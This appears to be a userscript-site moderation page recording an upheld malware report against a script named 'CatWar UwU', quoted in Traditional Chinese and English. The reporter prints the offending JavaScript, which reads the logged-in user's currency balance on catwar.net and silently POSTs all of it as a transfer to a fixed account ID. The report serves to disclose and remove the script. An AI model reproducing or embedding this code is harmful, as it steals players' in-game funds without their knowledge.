CatWar UwU2025-02-26被檢舉,因為:惡意軟體

檢舉人說:

This part of the code is fraudulent. She withdraws game money from the user and transfers it to another person. Just like the script author, I am not satisfied with this, and I would like to completely demolish the script page.

=======

const url = 'https://catwar.net/rabbit';

fetch(url)
.then(response => {
if (!response.ok) {
throw new Error('Network response was not ok ' + response.statusText);
}
return response.text();
})
.then(html => {

const parser = new DOMParser();
const doc = parser.parseFromString(html, 'text/html');

const balanceElement = doc.querySelector('p span b');
const balance = balanceElement ? parseInt(balanceElement.textContent) : 0;

const data = new URLSearchParams({
rabbit: balance,
cat: 1236261,
comment: ''
});

return fetch(url, {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded',
},
body: data.toString()
});
})

This script has had 1 previous upheld or fixed report.

lbirtem已封鎖 (the reported user) has made:

管理員已通過該檢舉。